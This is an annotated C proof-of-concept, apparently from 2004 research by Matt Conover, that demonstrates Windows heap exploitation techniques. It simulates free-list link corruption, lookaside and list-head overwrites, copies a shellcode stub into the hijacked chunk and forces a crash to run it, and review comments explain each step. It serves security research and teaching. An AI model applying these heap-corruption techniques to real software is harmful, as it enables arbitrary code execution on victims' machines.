// Proof-of-concept heap exploit code
// Written by Matt Conover in December 2004
#include <stdio.h>
#include <windows.h>
#undef NDEBUG
#include <assert.h>
#include "heap.h"
#include "util.h"
#include "shellcode.h"

// Start of the stub located in main() via GetFunctionAddress(); main() copies
// ShellcodeLength bytes from here into the chunk returned by the selected technique.
BYTE *Shellcode;
// Byte length of the stub, as reported by GetStubLength() (project helper).
DWORD ShellcodeLength;
// TEB/PEB addresses read through fs:[0x18] (and [TEB+0x30] for the PEB) by
// TestThread() and the DumpMem diagnostics in main(). pTEB is written by
// every TestThread instance without synchronization.
BYTE *pTEB, *pPEB;

// Thread body used only by the DumpMem demonstration in main().
// Stores the value at fs:[0x18] (the TEB self-pointer on 32-bit Windows) into
// the global pTEB, prints it, then sleeps forever so the thread stays alive.
// NOTE(review): MSVC-specific 32-bit inline assembly (`_asm`); it will not
// build with GCC/Clang syntax or for x64 targets.
// NOTE(review): pTEB is a shared global; the printf reads it back after the
// store, so with several TestThread instances running it may show another
// thread's value.
// NOTE(review): %08lx is used for a pointer argument; %p is the correct
// specifier.
// NOTE(review): the signature is void(void), not DWORD WINAPI (LPVOID);
// main() casts it to LPTHREAD_START_ROUTINE. The mismatch is harmless only
// because this function never returns.
void TestThread()
{
	_asm
	{
		mov eax, fs:[0x18]
		mov pTEB, eax
	}
	printf("TEB 0x%08lx\n", pTEB);
	while (1) { Sleep(1000); }
}

// Driver for the heap proof-of-concept.
// Flow: locate the stub, create a private growable heap, optionally dump
// TEB/PEB information (DumpMem), optionally run the unsafe-unlink demonstration
// (TestUnsafeUnlink, which ends the process with exit(0)), optionally perform
// random allocations and frees (DoRandomAllocs), then run the technique selected
// at compile time by a USE_* macro, copy the stub into the returned chunk, and
// write to 0xABABABAB to force an access violation.
// NOTE(review): with the flags as initialized below (TestUnsafeUnlink == TRUE),
// the exit(0) inside that branch makes everything after it unreachable.
// NOTE(review): %08lx is used throughout to print pointers; %p is the correct
// specifier.
int main(int argc, char *argv[])
{
	int i;
	BYTE *p;
	HEAP *pHeap;
	FILE *outfile = stdout;
	// Compile-time toggles for the demonstration stages below.
	BOOL DoRandomAllocs = TRUE, DumpMem = FALSE, TestUnsafeUnlink = TRUE;

	// NOTE(review): outfile is never written to or closed after this point;
	// all output goes to stdout via printf.
	if (argc > 1) outfile = fopen(argv[1], "w");
	if (!outfile) return -1;

	// Disabled configuration sanity check: compares runtime addresses against
	// constants expected from shellcode.h (see the error text).
#if 0
	if (*((DWORD *)PEB_LOCK_ROUTINE) != RTL_ENTER_CRITICAL_SECTION ||
		GetProcAddress(GetModuleHandle("ntdll"), "ZwTerminateThread") != (FARPROC)ZW_TERMINATE_THREAD ||
		GetProcAddress(GetModuleHandle("ntdll"), "ZwTerminateProcess") != (FARPROC)ZW_TERMINATE_PROCESS ||
		GetProcAddress(GetModuleHandle("kernel32"), "Sleep") != (FARPROC)SLEEP)
	{
		fprintf(stderr, "ERROR: You did not configure the settings properly\n");
		fprintf(stderr, "Define TEST_XPSP1 for XPSP1, TEST_XPSP2 for XPSP2, etc. (look at shellcode.h)\n");
		exit(0);
	}
#endif

	////////////////////////////////////////////////////////////////////////////////
	// Setup heap

	// Choose the C or the assembly stub. GetFunctionAddress/GetStubLength are
	// project helpers (presumably from util.h); their exact semantics are not
	// visible here.
#ifdef USE_C_SHELLCODE
	Shellcode = GetFunctionAddress((BYTE *)c_shellcode_stub);
#else
	Shellcode = GetFunctionAddress((BYTE *)shellcode_stub);
#endif
	ShellcodeLength = GetStubLength((BYTE *)Shellcode);
	//printf("Shellcode is %d bytes\n", ShellcodeLength);


	// Here we use a different heap to make things easier
	// Flag value 2 equals HEAP_GROWABLE. The returned HANDLE is treated as a
	// pointer to the project's HEAP struct so its fields can be read and written
	// directly.
	// NOTE(review): the HeapCreate result is not checked for NULL before the
	// dereference on the next line.
	pHeap = HeapCreate(2, 0x10000, 0);
	pHeap->ForceFlags = HEAP_GROWABLE;

	if (DumpMem) // demonstrate TEB
	{
		// Read the TEB self-pointer (fs:[0x18]) and the pointer stored at TEB+0x30.
		_asm
		{
			mov eax, fs:[0x18]
			mov pTEB, eax
			mov eax, [eax+0x30]
			mov pPEB, eax
		}
		// NOTE(review): the format has two conversions but three arguments are
		// passed, so "Heap base" prints pTEB rather than pHeap.
		printf("PEB at 0x%08lx, Heap base 0x%08lx\n", pPEB, pTEB, pHeap);
		printf("TEB at 0x%08lx\n", pTEB);
		assert(pTEB >= (BYTE *)0x7ffd4000); assert(pPEB >= (BYTE *)0x7ffd4000);
		// Spawn 11 threads, 100 ms apart; each prints its own TEB address.
		// NOTE(review): the CreateThread call sits inside assert(). NDEBUG is
		// #undef'd at the top of the file, so it still runs, but the thread
		// handles are never closed.
		for (i = 0; i < 11; i++)
		{
			Sleep(100);
			assert(CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TestThread, NULL, 0, NULL));
		}
	}
	
	if (TestUnsafeUnlink)
	{
		HEAP_FREE_ENTRY *chunk;

		// Allocate one chunk and compute its header address (user pointer minus
		// sizeof(HEAP_ENTRY)). The chunk is freed between the project helpers
		// FillLookasideList/EmptyLookasideList, presumably so that it ends up on
		// a free list rather than a lookaside list (TODO confirm against util.h).
		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		chunk = (HEAP_FREE_ENTRY *)(p - sizeof(HEAP_ENTRY));
		FillLookasideList(pHeap, ALLOC_SIZE);
		HeapFree(pHeap, 0, p);
		EmptyLookasideList(pHeap, ALLOC_SIZE);

		printf("before overwrite:\n");
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);
	
		// Simulated corruption: point the freed chunk's links at the Blink fields
		// of the heap's FreeLists[8] and FreeLists[9] list heads, then print the
		// list heads after each subsequent allocation.
		chunk->FreeList.Flink = (LIST_ENTRY *)(&pHeap->FreeLists[8].Blink);
		chunk->FreeList.Blink = (LIST_ENTRY *)(&pHeap->FreeLists[9].Blink);
		printf("\nafter overwrite:\n");
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		printf("chunk    [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", chunk, chunk->FreeList.Flink, chunk->FreeList.Blink);

		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		printf("\nafter 1st alloc (returned 0x%08lx):\n", p);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		
		p = HeapAlloc(pHeap, 0, ALLOC_SIZE); assert(p);
		printf("\nafter 2nd alloc (returned 0x%08lx):\n", p);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		// NOTE(review): the message shows 9 bytes of 0x90, but memset writes 12.
		printf("Copying 0x909090909090909090 into new chunk\n");
		memset(p, 0x90, 12);
		printf("freelist[n-1] [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[8], pHeap->FreeLists[8].Flink, pHeap->FreeLists[8].Blink);
		printf("freelist[n]   [0x%08lx] Flink 0x%08lx Blink 0x%08lx\n", &pHeap->FreeLists[9], pHeap->FreeLists[9].Flink, pHeap->FreeLists[9].Blink);
		// Terminates the process: nothing below this branch runs while
		// TestUnsafeUnlink is TRUE.
		exit(0);
	}

	if (DoRandomAllocs)
	{
		int ChunkSize, FreeChance, FreeCount, BusyCount, Count;
		// NOTE(review): shadows the outer `BYTE *p` for the rest of this block.
		char *p;
		
		// Perform 10..1009 allocations. Sizes are multiples of 8 in [8, 1016]
		// ((rand() % 1016) + 8 is in [8, 1023]; & ~7 rounds it down). About half
		// of the chunks are freed immediately.
		srand(GetTickCount());
		Count = (rand() % 1000) + 10;
		FreeCount = BusyCount = 0;

		for (i = 0; i < Count; i++)
		{
			FreeChance = (rand() % 100);
			ChunkSize = ((rand() % 1016) + 8) & 0xFFFFFFF8;
			printf("\tAllocate %d size chunk", ChunkSize);
			p = GetChunk(pHeap, ChunkSize); assert(p);
			if (FreeChance < 50)
			{
				printf(" (freed)\n");
				FreeCount++;
				HeapFree(pHeap, 0, p);
			}
			else
			{
				putchar('\n');
				BusyCount++;
			}
		}
		// NOTE(review): BusyCount is tallied but never reported.
		printf("\nBase condition (all chunk sizes are < 1K):\n\t%d allocs\n\t%d frees\n\n", Count, FreeCount);
		//printf("Hit Enter to continue... "); getchar();
	}


	// Exactly one technique is chosen at compile time. The #elif branches test
	// each macro's value, so it must be defined to a nonzero value; undefined
	// identifiers evaluate to 0. If none is set, the build fails via #error.
#ifdef USE_CHUNK_ON_LOOKASIDE_OVERWRITE
	p = DoChunkOnLookasideOverwrite(pHeap);

#elif USE_UNSAFE_UNLINKING_FREELIST_OVERWRITE
	p = DoUnsafeUnlinkingFreeListOverwrite(pHeap);

#elif USE_FREELIST_LISTHEAD_OVERWRITE
	p = DoListHeadOverwrite(pHeap);

#elif USE_LOOKASIDE_LISTHEAD_OVERWRITE
	// NOTE(review): the stub is copied here and copied again unconditionally
	// after the #endif.
	p = DoListHeadOverwrite(pHeap);
	memcpy(p, Shellcode, ShellcodeLength);

#elif USE_CACHE_OVERWRITE
	assert(InitializeHeapCache(pHeap));
	p = DoCacheOverwrite(pHeap);
	assert(p);

#elif USE_LOOKASIDE_REMAP
	p = DoLookasideRemap(pHeap);
	assert(p);

#else
#error "Not implemented"
#endif

	/////////////////////////////////////////////////////////////////////////////////
	// Now cause a crash to force shellcode execution immediate
	/////////////////////////////////////////////////////////////////////////////////

	// Copy the stub into the chunk returned above, then write to an unmapped
	// address (0xABABABAB) to raise an access violation deliberately.
	assert(p); memcpy(p, Shellcode, ShellcodeLength);
	printf("\nNow forcing a crash...\n");
	p = (BYTE *)0xABABABAB; *p = 0;

	return 0;
}

